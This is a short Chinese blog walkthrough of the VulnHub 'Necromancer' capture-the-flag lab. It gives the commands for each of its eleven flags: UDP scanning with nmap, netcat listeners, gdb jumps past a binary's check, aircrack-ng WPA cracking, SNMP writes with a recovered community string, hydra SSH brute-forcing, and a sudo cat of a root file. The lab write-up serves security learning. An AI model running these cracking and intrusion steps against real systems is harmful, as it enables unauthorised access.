vulnhub Necromancer wp

flag1

nmap -sU -T4 192.168.220.130 有666端口

nc -nvu 192.168.220.130 666 监听回显消息

tcpdump host 192.168.220.130抓包查看发现有到4444端口的流量

nc -nvlp 4444 监听发现字符串,解码后得到flag1

flag2

根据flag1的解码字符串提示,在监听666端口时输入opensesame,得到flag2

flag3

访问80端口,下载图片binwalk查看,是个压缩包,dd或者直接改后缀名解压缩,得到flag3

flag4

谷歌搜索提示magic items wiki将网站内容制作为字典爆破目录(连不上google失败),得到tailsman文件

cewl https://en.wikipedia.org/wiki/List_of_mythological_objects -d 0 -w /root/Desktop/magicItems.txt –v

修改权限为777,执行没有结果

debug

gdb ./tailsman
info functions
break wearTalisman #穿衣服时打断点
run
jump chantToBreakSpell #跳到断点,得到flag4

flag5

flag4为md5,解密为blackmagic,根据flag监听31337

nc -nvu 192.168.220.130 31337

输入blackmagic得到flag5

flag6

flag5提示/thenecromancerwillabsorbyoursoul/

访问得到flag6

flag7

thenecromancerwillabsorbyoursoul界面的图片链接点击后下载得到压缩包,解压后为pcap,协议为802.11,所以是无线网络

aircrack-ng破解

aircrack-ng ./necromancer.cap -w /usr/share/wordlists/rockyou.txt

得到key death2all

snmp-check -c death2all -v 1 -t 1 192.168.220.130 #查看到flag7
snmpwalk -v 2c -c death2allrw 192.168.220.130 #查看OID
snmpset -c death2allrw -v 1 192.168.220.130 iso.3.6.1.2.1.1.6.0 s Unlocked #根据OID解锁
snmp-check -c death2all -v 1 192.168.220.130

flag8、9、10

flag7的md5为demonslayer,且显示22端口,尝试爆破密码

hydra -l demonslayer -P /usr/share/wordlists/rockyou.txt 192.168.220.130 ssh

得到密码12345678,ssh连接有个flag8文件

根据提示监听777端口

nc -u localhost 777,敲击回车两次,之后根据谷歌得到的答案回答得到flag8、9、10

flag11

ctrk+c返回,ls -al查看有.smallvile文件,打开没有线索

sudo -l查看有/bin/cat 和/root/flag11.txt

执行sudo /bin/cat /root/flag11.txt,结束

posted @   JICEY  阅读(41)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构

阅读目录(Content)

此页目录为空

点击右上角即可分享
微信分享提示